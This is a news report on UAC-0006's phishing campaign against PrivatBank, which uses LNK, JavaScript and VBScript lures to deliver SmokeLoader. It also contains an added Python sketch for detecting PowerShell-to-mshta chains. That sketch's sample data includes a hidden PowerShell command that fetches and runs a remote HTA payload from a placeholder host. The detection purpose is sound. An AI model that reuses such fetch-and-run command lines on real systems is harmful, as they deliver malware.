A financially motivated threat group tracked as UAC-0006 has resurfaced with a sophisticated phishing campaign targeting PrivatBank, Ukraine’s largest state-owned bank. The group is using advanced techniques to bypass detection and deploy SmokeLoader malware, which facilitates long-term access to compromised systems and the theft of sensitive financial data.
The campaign, discovered by cybersecurity analysts from CloudSEK, involves password-protected archives containing malicious JavaScript, VBScript, and LNK files. The files, once activated, execute a series of commands to inject malicious code into legitimate Windows binaries.
In this latest attack, cybercriminals send phishing emails with password-protected ZIP or RAR files. The files, disguised as legitimate invoices or other business-related attachments, contain malicious JavaScript or VBScript files. Once the file is extracted and opened, the scripts run PowerShell commands that deliver the SmokeLoader malware. The malware establishes command-and-control (C2) communication with the attacker’s servers, allowing the threat group to maintain persistent access to the compromised systems.
“More recently, we are starting to see UAC-0006 use an LNK lure in their phishing baits. When the .lnk file is executed, it runs powershell.exe with the specified command line arguments. This launches mshta.exe to retrieve and execute the file hosted on the C2 servers,” the researchers noted.
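The chain described above (an LNK lure that starts powershell.exe, which in turn launches mshta.exe to fetch a file from a remote host) is visible in process-creation telemetry as a parent/child relationship plus a URL on the child's command line. The following detection sketch is an added example, not code from CloudSEK or from the article; the event fields mirror Sysmon Event ID 1 style data and the sample records are constructed for illustration.

```python
"""Flag powershell.exe spawning a script host (mshta.exe etc.) with a remote URL argument."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Script hosts commonly abused to pull and run remote content; mshta.exe is the one named on this page.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_chains(events):
    """Return (parent, child) pairs where powershell.exe spawns a script host given a URL."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        if basename(child.image) not in SCRIPT_HOSTS or not URL_RE.search(child.cmdline):
            continue
        parent = by_pid.get(child.ppid)
        if parent is not None and basename(parent.image) == "powershell.exe":
            hits.append((parent, child))
    return hits


# Constructed sample telemetry (not real campaign data): one benign explorer -> powershell -> notepad
# chain and one chain matching the lure described in the article. The URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "mshta http://example.invalid/payload.hta"'),
    ProcEvent(1300, 1200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/payload.hta"),
    ProcEvent(1400, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File backup.ps1"),
    ProcEvent(1500, 1400, r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for parent, child in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"ALERT pid={child.pid}: {basename(parent.image)} -> {basename(child.image)}: {child.cmdline}")
```

In real deployments the same logic maps onto an EDR or SIEM query over the ParentImage, Image and CommandLine fields; the parent of the PowerShell process (typically explorer.exe when a user double-clicks the .lnk) adds useful context for triage.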
UAC-0006 has been actively targeting Ukrainian financial institutions since November 2024, using payment-themed phishing lures designed to trick users into downloading the malicious attachments.
The researchers noted overlap in UAC-0006's tactics, techniques, and procedures (TTPs) with other notorious cybercriminal groups, such as EmpireMonkey, which is thought to be linked to Carbanak, Anunak, and the infamous FIN7, a Russian cyber espionage group.
Earlier this month, cybersecurity firm Trend Micro reported that a zero-day vulnerability (CVE-2025-0411) in the popular open-source file archiver tool 7-Zip has been actively exploited by Russia-linked threat actors in a targeted SmokeLoader malware campaign against Ukrainian entities.